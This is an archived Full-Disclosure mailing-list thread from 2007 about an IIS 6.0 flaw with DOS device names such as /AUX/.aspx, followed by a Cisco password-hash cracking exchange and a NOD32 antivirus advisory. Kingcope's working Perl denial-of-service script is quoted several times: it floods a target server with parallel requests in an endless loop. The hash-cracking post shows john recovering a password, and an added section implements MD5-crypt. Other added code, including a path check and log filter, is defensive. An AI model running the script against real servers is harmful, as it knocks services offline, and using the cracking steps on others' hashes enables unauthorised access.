k> From: kingcope [mailto:[EMAIL PROTECTED] 
k> Sent: Wednesday, May 23, 2007 10:55 AM
k> To: '3APA3A'
k> Cc: 'Full-Disclosure'; '[EMAIL PROTECTED]'
k> Subject: RE: [Full-disclosure] Question Regarding IIS 6.0 / Is this a
DoS???

k> Hello Russian friend,

k> This is an interesting thought. As you see in the exception
k> and in the exception backtrace of IIS it tries to access \\.\AUX
k> or other special device names. Normally this is blocked by a
k> C# method which checks the path (for example /AUX.aspx is blocked).


k> Best Regards,

k> Kingcope

k> -Original Message-
k> From: 3APA3A [mailto:[EMAIL PROTECTED] 
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; [EMAIL PROTECTED]
k> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a
DoS???

k> Dear kingcope,

k> It's a vulnerability regardless of DoS impact, because it allows an attacker
k> to access special DOS devices (COM1 in this case). E.g. it could be used
k> to read data from a device attached to COM1 or prevent another application
k> from accessing this port (or LPT), because access to ports is exclusive.

k> --Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
k> full-disclosure@lists.grok.org.uk:

k>> Hello List,

k>> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k>> When I request /AUX/.aspx the server takes a bit longer to respond than
k>> normally. So I wrote an automated script to see what happens if
k>> I request this file several times at once. The result is that some servers
k>> on the internet get quite unstable, some do not. On some servers after I
k>> stop the attack I get an exception that the server is too busy/Unhandled
k>> Exception on the wwwroot (/) path.
k>> Can you/the list confirm that?

k>> Here is a lame testing script for this stuff:





k>> #When sending multiple parallel GET requests to an IIS 6.0 server requesting
k>> #/AUX/.aspx the server gets unstable and non-responsive. This happens only
k>> #to servers which respond with a runtime error (System.Web.HttpException)
k>> #and take two or more seconds to respond to the /AUX/.a

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

2007-05-23 Thread 3APA3A
Dear kingcope,

With debugging it looks quite harmless:

Server Error in '/' Application.


Directory '\\.\aux' does not exist. Failed to start monitoring file changes. 
Description: An unhandled exception occurred during the execution of the 
current web request. Please review the stack trace for more information about 
the error and where it originated in the code. 

Exception Details: System.Web.HttpException: Directory '\\.\aux' does not 
exist. Failed to start monitoring file changes.

Source Error: 

An unhandled exception was generated during the execution of the current web 
request. Information regarding the origin and location of the exception can be 
identified using the exception stack trace below.  

Stack Trace: 


[HttpException (0x80070002): Directory '\\.\aux' does not exist. Failed to 
start monitoring file changes.]
   System.Web.FileChangesMonitor.FindDirectoryMonitor(String dir, Boolean 
addIfNotFound, Boolean throwOnError) +527
   System.Web.FileChangesMonitor.StartMonitoringPath(String alias, 
FileChangeEventHandler callback) +477
   System.Web.Caching.CacheDependency.Init(Boolean isPublic, Boolean 
isSensitive, String[] filenamesArg, String[] cachekeysArg, CacheDependency 
dependency, DateTime utcStart) +1535
   System.Web.Caching.CacheDependency..ctor(Boolean isSensitive, String[] 
filenames, DateTime utcStart) +50
   
System.Web.Configuration.HttpConfigurationSystem.GetCacheDependencies(Hashtable 
cachedeps, DateTime utcStart) +151
   System.Web.Configuration.HttpConfigurationSystem.ComposeConfig(String 
reqPath, IHttpMapPath configmap) +760
   System.Web.HttpContext.GetCompleteConfigRecord(String reqpath, IHttpMapPath 
configmap) +434
   System.Web.HttpContext.GetCompleteConfig() +49
   System.Web.HttpContext.GetConfig(String name) +195
   System.Web.CustomErrors.GetSettings(HttpContext context, Boolean canThrow) 
+20
   System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow) +39
   System.Web.HttpRuntime.FinishRequest(HttpWorkerRequest wr, HttpContext 
context, Exception e) +486

 



Version Information: Microsoft .NET Framework Version:1.1.4322.2032; ASP.NET 
Version:1.1.4322.2032 

--Wednesday, May 23, 2007, 1:35:17 PM, you wrote to [EMAIL PROTECTED]:

k> Btw,
k> Here is a screenshot of the effect.


k> -Original Message-
k> From: kingcope [mailto:[EMAIL PROTECTED] 
k> Sent: Wednesday, May 23, 2007 10:55 AM
k> To: '3APA3A'
k> Cc: 'Full-Disclosure'; '[EMAIL PROTECTED]'
k> Subject: RE: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Hello Russian friend,

k> This is an interesting thought. As you see in the exception
k> and in the exception backtrace of IIS it tries to access \\.\AUX
k> or other special device names. Normally this is blocked by a
k> C# method which checks the path (for example /AUX.aspx is blocked).


k> Best Regards,

k> Kingcope

k> -Original Message-
k> From: 3APA3A [mailto:[EMAIL PROTECTED] 
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; [EMAIL PROTECTED]
k> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Dear kingcope,

k> It's a vulnerability regardless of DoS impact, because it allows an attacker
k> to access special DOS devices (COM1 in this case). E.g. it could be used
k> to read data from a device attached to COM1 or prevent another application
k> from accessing this port (or LPT), because access to ports is exclusive.

k> --Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
k> full-disclosure@lists.grok.org.uk:

k>> Hello List,

k>> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k>> When I request /AUX/.aspx the server takes a bit longer to respond than
k>> normally. So I wrote an automated script to see what happens if
k>> I request this file several times at once. The result is that some servers
k>> on the internet get quite unstable, some do not. On some servers after I
k>> stop the attack I get an exception that the server is too busy/Unhandled
k>> Exception on the wwwroot (/) path.
k>> Can you/the list confirm that?

k>> Here is a lame testing script for this stuff:





k>> #When sending multiple parallel GET requests to an IIS 6.0 server requesting
k>> #/AUX/.aspx the server gets unstable and non-responsive. This happens only
k>> #to servers which respond with a runtime error (System.Web.HttpException)
k>> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k>> #
k>> #
k>> #signed,
k>> #Kingcope [EMAIL PROTECTED]
k>> ##
k>> ###***
k>> ###
k>> ###
k>> ###
k>> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k>> ### by Kingcope, May/2007
k>> ### Better run this fr

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

2007-05-23 Thread 3APA3A
Dear kingcope,

Funny enough, there is a chance this vulnerability can also be exploited
as a local unauthorized access or privilege escalation, to execute
user-supplied .aspx script from a COM port (via serial cable) without
having console access, with the permissions of the Web application.
IWAM_%COMPUTERNAME% is the default, but it's often elevated for application
pools for different reasons.

Needs to be tested, though.

The same vulnerability existed in IndigoPerl some time ago. See "One more
funny bug" in http://securityvulns.com/docs6145.html


--Wednesday, May 23, 2007, 12:54:35 PM, you wrote to [EMAIL PROTECTED]:

k> Hello Russian friend,

k> This is an interesting thought. As you see in the exception
k> and in the exception backtrace of IIS it tries to access \\.\AUX
k> or other special device names. Normally this is blocked by a
k> C# method which checks the path (for example /AUX.aspx is blocked).


k> Best Regards,

k> Kingcope

k> -Original Message-
k> From: 3APA3A [mailto:[EMAIL PROTECTED] 
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; [EMAIL PROTECTED]
k> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Dear kingcope,

k> It's a vulnerability regardless of DoS impact, because it allows an attacker
k> to access special DOS devices (COM1 in this case). E.g. it could be used
k> to read data from a device attached to COM1 or prevent another application
k> from accessing this port (or LPT), because access to ports is exclusive.

k> --Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
k> full-disclosure@lists.grok.org.uk:

k>> Hello List,

k>> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k>> When I request /AUX/.aspx the server takes a bit longer to respond than
k>> normally. So I wrote an automated script to see what happens if
k>> I request this file several times at once. The result is that some servers
k>> on the internet get quite unstable, some do not. On some servers after I
k>> stop the attack I get an exception that the server is too busy/Unhandled
k>> Exception on the wwwroot (/) path.
k>> Can you/the list confirm that?

k>> Here is a lame testing script for this stuff:





k>> #When sending multiple parallel GET requests to an IIS 6.0 server requesting
k>> #/AUX/.aspx the server gets unstable and non-responsive. This happens only
k>> #to servers which respond with a runtime error (System.Web.HttpException)
k>> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k>> #
k>> #
k>> #signed,
k>> #Kingcope [EMAIL PROTECTED]
k>> ##
k>> ###***
k>> ###
k>> ###
k>> ###
k>> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k>> ### by Kingcope, May/2007
k>> ### Better run this from a Linux system
k>> ##

k>> use IO::Socket;
k>> use threads;

k>> if ($ARGV[0] eq "") { exit; }
k>> my $host = $ARGV[0];

k>> $|=1;

k>> sub sendit {
k>> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>>   PeerPort => 'http(80)',
k>>   Proto=> 'tcp');

k>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k>> $host\r\nConnection:close\r\n\r\n";
k>> }

k>> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>>   PeerPort => 'http(80)',
k>>   Proto=> 'tcp');

k>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k>> $host\r\nConnection:close\r\n\r\n";

k>> $k=0;
k>> while (<$sock>) {
k>> if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k>> $k=1;
k>> last;
k>> }
k>> }

k>> if ($k==0) {
k>> print "Server does not seem vulnerable to this attack.\n";
k>> exit;   
k>> }

k>> print "ATTACK!\n";

k>> while(1){

k>> for (my $i=0;$i<=100;$i++) {
k>> $thr = threads->new(\&sendit);
k>> print "\r\r\r$i/100";
k>> }

k>> foreach $thr (threads->list) {
k>> $thr->join;
k>> }
k>> }






-- 
~/ZARAZA http://securityvulns.com/
So he dies for the sixth time, and again in a new place. (Twain)


Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

2007-05-23 Thread Richard Moore
Michael Silk wrote:
> i wonder; does it happen with the word "CON" instead of "AUX"? there are
> also more of these 'reserved' words; i can't remember them though.

CON, AUX, PRN, NUL
COM1 thru COM4
LPT1 thru LPT3

Rich.
-- 
Richard Moore, Principal Software Engineer,
Westpoint Ltd,
Albion Wharf, 19 Albion Street, Manchester, M1 5LN, England
Tel: +44 161 237 1028
Fax: +44 161 237 1031

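
Rich's list is the classic DOS set; Win32 itself reserves CON, PRN, AUX, NUL, COM1 through COM9 and LPT1 through LPT9, and resolves a name to the device even with an extension, trailing spaces or a stream suffix attached, which is why AUX.aspx ends up at \\.\AUX in the stack trace above. Kingcope's observation that /AUX.aspx is blocked while /AUX/.aspx is not suggests the existing check only looked at the final path segment. The Python below is an added example, not code from Microsoft or from anyone in this thread: it decodes the request path and checks every segment, and then runs the same check over a few IIS W3C-style log lines to flag probes after the fact. The log lines, their field layout and the sample requests are constructed for the example.

```python
import re
from urllib.parse import unquote

# Win32 device names (MSDN "Naming Files, Paths, and Namespaces").
# The CON/AUX/PRN/NUL/COM1-4/LPT1-3 list in the thread is the older DOS subset.
RESERVED = {"CON", "PRN", "AUX", "NUL"}
RESERVED |= {"COM%d" % i for i in range(1, 10)}
RESERVED |= {"LPT%d" % i for i in range(1, 10)}


def device_name_of(segment: str):
    """Return the reserved device a single path segment resolves to, or None.

    Win32 opens \\.\AUX for 'AUX', 'AUX.aspx', 'aux.', 'AUX ' and 'AUX:stream':
    everything from the first '.' or ':' on is ignored, as are trailing spaces.
    """
    name = re.split(r"[.:]", segment, maxsplit=1)[0].rstrip(" ").upper()
    return name if name in RESERVED else None


def reserved_device_in_path(url_path: str):
    """Check every segment, not just the last one; /AUX/.aspx is the thread's request.

    %-escapes are decoded twice so that %2541UX (double-encoded 'A') is caught,
    and a backslash counts as a separator because the Win32 file APIs accept it.
    """
    decoded = unquote(unquote(url_path)).replace("\\", "/")
    for segment in decoded.split("/"):
        device = device_name_of(segment)
        if device:
            return device
    return None


# Constructed IIS 6 W3C log lines (cs-uri-stem is the fifth field); not from any real server.
SAMPLE_LOG = """\
2007-05-22 09:10:08 10.0.0.5 GET /AUX/.aspx - 80 - 192.0.2.10 Mozilla/4.0 500 0 0
2007-05-22 09:10:09 10.0.0.5 GET /images/logo.png - 80 - 192.0.2.10 Mozilla/4.0 200 0 0
2007-05-22 09:10:10 10.0.0.5 GET /%41UX.aspx - 80 - 192.0.2.10 Mozilla/4.0 500 0 0
2007-05-22 09:10:11 10.0.0.5 GET /docs/com1.txt - 80 - 192.0.2.10 Mozilla/4.0 404 0 0
2007-05-22 09:10:12 10.0.0.5 GET /auxiliary/page.aspx - 80 - 192.0.2.10 Mozilla/4.0 200 0 0
"""


def flag_device_requests(log_text: str):
    """Return (uri_stem, device) for each request whose path touches a device name."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0].startswith("#"):
            continue
        uri = fields[4]
        device = reserved_device_in_path(uri)
        if device:
            hits.append((uri, device))
    return hits


if __name__ == "__main__":
    for uri, device in flag_device_requests(SAMPLE_LOG):
        print("%-25s -> \\\\.\\%s" % (uri, device))
```

Two things the segment-by-segment check buys you: the device name is rejected wherever it appears in the path, so the ASP.NET file-change monitor in the stack trace above is never asked to watch \\.\AUX, and the same function doubles as a log-triage filter for the probes kingcope's script sends. Whether a given ASP.NET version already blocks the directory form is something to verify against that version, not assume from this example.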


Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

2007-05-23 Thread Michael Silk

i wonder; does it happen with the word "CON" instead of "AUX"? there are
also more of these 'reserved' words; i can't remember them though.



On 5/23/07, kingcope <[EMAIL PROTECTED]> wrote:


Hello Russian friend,

This is an interesting thought. As you see in the exception
and in the exception backtrace of IIS it tries to access \\.\AUX
or other special device names. Normally this is blocked by a
C# method which checks the path (for example /AUX.aspx is blocked).


Best Regards,

Kingcope

-Original Message-
From: 3APA3A [mailto:[EMAIL PROTECTED]
Sent: Wednesday, May 23, 2007 10:41 AM
To: kingcope
Cc: Full-Disclosure; [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a
DoS???

Dear kingcope,

It's a vulnerability regardless of DoS impact, because it allows an attacker
to access special DOS devices (COM1 in this case). E.g. it could be used
to read data from a device attached to COM1 or prevent another application
from accessing this port (or LPT), because access to ports is exclusive.

--Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
full-disclosure@lists.grok.org.uk:

k> Hello List,

k> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k> When I request /AUX/.aspx the server takes a bit longer to respond than
k> normally. So I wrote an automated script to see what happens if
k> I request this file several times at once. The result is that some servers
k> on the internet get quite unstable, some do not. On some servers after I
k> stop the attack I get an exception that the server is too busy/Unhandled
k> Exception on the wwwroot (/) path.
k> Can you/the list confirm that?

k> Here is a lame testing script for this stuff:





k> #When sending multiple parallel GET requests to an IIS 6.0 server requesting
k> #/AUX/.aspx the server gets unstable and non-responsive. This happens only
k> #to servers which respond with a runtime error (System.Web.HttpException)
k> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k> #
k> #
k> #signed,
k> #Kingcope [EMAIL PROTECTED]
k> ##
k> ###***
k> ###
k> ###
k> ###
k> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k> ### by Kingcope, May/2007
k> ### Better run this from a Linux system
k> ##

k> use IO::Socket;
k> use threads;

k> if ($ARGV[0] eq "") { exit; }
k> my $host = $ARGV[0];

k> $|=1;

k> sub sendit {
k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>   PeerPort => 'http(80)',
k>   Proto=> 'tcp');

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";
k> }

k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>   PeerPort => 'http(80)',
k>   Proto=> 'tcp');

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";

k> $k=0;
k> while (<$sock>) {
k>  if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k>  $k=1;
k>  last;
k>  }
k> }

k> if ($k==0) {
k>  print "Server does not seem vulnerable to this attack.\n";
k>  exit;
k> }

k> print "ATTACK!\n";

k> while(1){

k> for (my $i=0;$i<=100;$i++) {
k>  $thr = threads->new(\&sendit);
k>  print "\r\r\r$i/100";
k> }

k> foreach $thr (threads->list) {
k>  $thr->join;
k> }
k> }




--
~/ZARAZA http://securityvulns.com/
For facts are facts, and they are set forth only so that they may be understood
and believed. (Twain)






--
mike
00110001 <3 00110111

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

2007-05-23 Thread kingcope
Hello Russian friend,

This is an interesting thought. As you see in the exception
and in the exception backtrace of IIS it tries to access \\.\AUX
or other special device names. Normally this is blocked by a
C# method which checks the path (for example /AUX.aspx is blocked).


Best Regards,

Kingcope

-Original Message-
From: 3APA3A [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, May 23, 2007 10:41 AM
To: kingcope
Cc: Full-Disclosure; [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

Dear kingcope,

It's a vulnerability regardless of DoS impact, because it allows an attacker
to access special DOS devices (COM1 in this case). E.g. it could be used
to read data from a device attached to COM1 or prevent another application
from accessing this port (or LPT), because access to ports is exclusive.

--Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
full-disclosure@lists.grok.org.uk:

k> Hello List,

k> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k> When I request /AUX/.aspx the server takes a bit longer to respond than
k> normally. So I wrote an automated script to see what happens if
k> I request this file several times at once. The result is that some servers
k> on the internet get quite unstable, some do not. On some servers after I
k> stop the attack I get an exception that the server is too busy/Unhandled
k> Exception on the wwwroot (/) path.
k> Can you/the list confirm that?

k> Here is a lame testing script for this stuff:





k> #When sending multiple parallel GET requests to an IIS 6.0 server requesting
k> #/AUX/.aspx the server gets unstable and non-responsive. This happens only
k> #to servers which respond with a runtime error (System.Web.HttpException)
k> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k> #
k> #
k> #signed,
k> #Kingcope [EMAIL PROTECTED]
k> ##
k> ###***
k> ###
k> ###
k> ###
k> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k> ### by Kingcope, May/2007
k> ### Better run this from a Linux system
k> ##

k> use IO::Socket;
k> use threads;

k> if ($ARGV[0] eq "") { exit; }
k> my $host = $ARGV[0];

k> $|=1;

k> sub sendit {
k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>   PeerPort => 'http(80)',
k>   Proto=> 'tcp');

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";
k> }

k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>   PeerPort => 'http(80)',
k>   Proto=> 'tcp');

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";

k> $k=0;
k> while (<$sock>) {
k>  if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k>  $k=1;
k>  last;
k>  }
k> }

k> if ($k==0) {
k>  print "Server does not seem vulnerable to this attack.\n";
k>  exit;   
k> }

k> print "ATTACK!\n";

k> while(1){

k> for (my $i=0;$i<=100;$i++) {
k>  $thr = threads->new(\&sendit);
k>  print "\r\r\r$i/100";
k> }

k> foreach $thr (threads->list) {
k>  $thr->join;
k> }
k> }




-- 
~/ZARAZA http://securityvulns.com/
For facts are facts, and they are set forth only so that they may be understood
and believed. (Twain)


Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

2007-05-23 Thread 3APA3A
Dear kingcope,

It's a vulnerability regardless of DoS impact, because it allows an attacker
to access special DOS devices (COM1 in this case). E.g. it could be used
to read data from a device attached to COM1 or prevent another application
from accessing this port (or LPT), because access to ports is exclusive.

--Tuesday, May 22, 2007, 9:10:08 AM, you wrote to 
full-disclosure@lists.grok.org.uk:

k> Hello List,

k> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k> When I request /AUX/.aspx the server takes a bit longer to respond than
k> normally. So I wrote an automated script to see what happens if
k> I request this file several times at once. The result is that some servers
k> on the internet get quite unstable, some do not. On some servers after I
k> stop the attack I get an exception that the server is too busy/Unhandled
k> Exception on the wwwroot (/) path.
k> Can you/the list confirm that?

k> Here is a lame testing script for this stuff:





k> #When sending multiple parallel GET requests to an IIS 6.0 server requesting
k> #/AUX/.aspx the server gets unstable and non-responsive. This happens only
k> #to servers which respond with a runtime error (System.Web.HttpException)
k> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k> #
k> #
k> #signed,
k> #Kingcope [EMAIL PROTECTED]
k> ##
k> ###***
k> ###
k> ###
k> ###
k> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k> ### by Kingcope, May/2007
k> ### Better run this from a Linux system
k> ##

k> use IO::Socket;
k> use threads;

k> if ($ARGV[0] eq "") { exit; }
k> my $host = $ARGV[0];

k> $|=1;

k> sub sendit {
k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>   PeerPort => 'http(80)',
k>   Proto=> 'tcp');

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";
k> }

k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>   PeerPort => 'http(80)',
k>   Proto=> 'tcp');

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";

k> $k=0;
k> while (<$sock>) {
k>  if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k>  $k=1;
k>  last;
k>  }
k> }

k> if ($k==0) {
k>  print "Server does not seem vulnerable to this attack.\n";
k>  exit;   
k> }

k> print "ATTACK!\n";

k> while(1){

k> for (my $i=0;$i<=100;$i++) {
k>  $thr = threads->new(\&sendit);
k>  print "\r\r\r$i/100";
k> }

k> foreach $thr (threads->list) {
k>  $thr->join;
k> }
k> }




-- 
~/ZARAZA http://securityvulns.com/
For facts are facts, and they are set forth only so that they may be understood
and believed. (Twain)


Re: [Full-disclosure] Enable secret 5 : Cisco Password

2007-05-23 Thread Knud Erik Højgaard
like wow man, CISSP, CCE, C/EH.
$ echo 'cissp:$1$AEIL$mTOIXKl4D6j9puGp7T1ah/' > cissp-lol.txt
$ john -inc:all cissp-lol.txt
Loaded 1 password hash (FreeBSD MD5 [32/32])
abc  (cissp)
guesses: 1  time: 0:00:00:00  c/s: 2502  trying: abc
--
Knud

On 5/23/07, wilder_jeff Wilder <[EMAIL PROTECTED]> wrote:
> Anyone have any tools to crack a cisco secret 5 password?  I know cain will
> crack a 7 password...
>
> If you would please respond off list I would be appreciative.
>
> any help out there?
>
>
> -Jeff Wilder
> CISSP,CCE,C/EH
>
>


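Added example, not code from Knud's post: a pure-Python implementation of FreeBSD MD5-crypt, the `$1$` scheme john labels above and the one Cisco `enable secret 5` stores, so the cost of a single guess is visible: three MD5 passes plus a fixed 1000-round loop, which is why a short secret falls in well under a second at the c/s shown. Function and constant names are my own; the only page value used is the hash from the post.

```python
import hashlib
import hmac

# Alphabet used by crypt(3) for its radix-64 output encoding.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"
# The hash from Knud's post (salt AEIL); john recovered "abc" for it.
POSTED_HASH = "$1$AEIL$mTOIXKl4D6j9puGp7T1ah/"


def _to64(value: int, count: int) -> str:
    """Encode the low 6*count bits of value, least significant group first."""
    return "".join(ITOA64[(value >> (6 * i)) & 0x3F] for i in range(count))


def md5crypt(password: str, salt: str) -> str:
    """FreeBSD MD5-crypt ($1$): accepts a bare salt or a full $1$salt$hash."""
    pw = password.encode()
    if salt.startswith("$1$"):
        salt = salt[3:]
    sp = salt.split("$", 1)[0][:8].encode()   # salt stops at '$', max 8 chars

    ctx = hashlib.md5(pw + MAGIC + sp)
    alt = hashlib.md5(pw + sp + pw).digest()
    pl = len(pw)
    while pl > 0:                              # mix in len(pw) bytes of alt
        ctx.update(alt[:min(16, pl)])
        pl -= 16
    i = len(pw)
    while i:                                   # one byte per bit of len(pw)
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    for i in range(1000):                      # fixed 1000 rounds, unsalted cost
        ctx1 = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            ctx1.update(sp)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()

    f = final                                  # crypt(3)'s byte shuffle on output
    groups = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    out = "".join(_to64((f[a] << 16) | (f[b] << 8) | f[c], 4) for a, b, c in groups)
    return "$1$" + sp.decode() + "$" + out + _to64(f[11], 2)


def verify(password: str, stored: str) -> bool:
    """Constant-time check of a candidate password against a stored $1$ hash."""
    return hmac.compare_digest(md5crypt(password, stored), stored)
```

`verify("abc", POSTED_HASH)` returns True, reproducing john's result; the same routine is what an audit of exported configs would run over a list of known-weak secrets.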

[Full-disclosure] NOD32 Antivirus Long Path Name Stack Overflow Vulnerabilities

2007-05-23 Thread Ismael Briones
NOD32 Antivirus Long Path Name Stack Overflow Vulnerabilities

I - DESCRIPTION

NOD32 Antivirus is vulnerable to two stack overflow vulnerabilities.
The vulnerabilities can be exploited when the AV tries to
delete/disinfect or rename a detected malware in a specially formatted
directory.

These vulnerabilities can lead to local/remote arbitrary code execution.


II - DISCLOSURE TIMELINE

19/04/2007 - First Vulnerability reported to ESET
19/04/2007 - ESET Response
20/04/2007 - Vulnerability Analysis and PoC sent to ESET
20/04/2007 - ESET initial feedback
24/04/2007 - Confirmed the bug and fixed
07/05/2007 - ESET made available the updates
10/05/2007 - A second vulnerability was found and reported to ESET
with a PoC and analysis
10/05/2007 - ESET response, Confirmed the bug and fixed
15/05/2007 - ESET made available the updates
19/05/2007 - Coordinated public disclosure

III - AFFECTED PRODUCTS

NOD32 Antivirus v2.7 (Windows version) (Versions prior to the update
2.70.37.0)

IV - ADVANCED DESCRIPTION

It's not going to be publicly available; it has only been shared with ESET.

V - EXPLOITATION

A PoC has been developed to probe the vulnerability, but it's not going
to be publicly available. It has only been shared with ESET.

Although the vulnerabilities are hard to exploit, it's not impossible.
There are some restrictions to bypass:

   - The path name is formatted in Unicode, so we have to find an opcode
at an address with a Unicode format
   - The shellcode has to be in the path name so we have to use an
Alphanumeric shellcode


VI - SOLUTION

The vulnerabilities were reported on April 19 and on May 10. An update
has been issued on May 18 to solve these vulnerabilities through the
regular update mechanism.

VII - CREDIT

Bug found by Ismael Briones 
[http://www.inkatel.com]
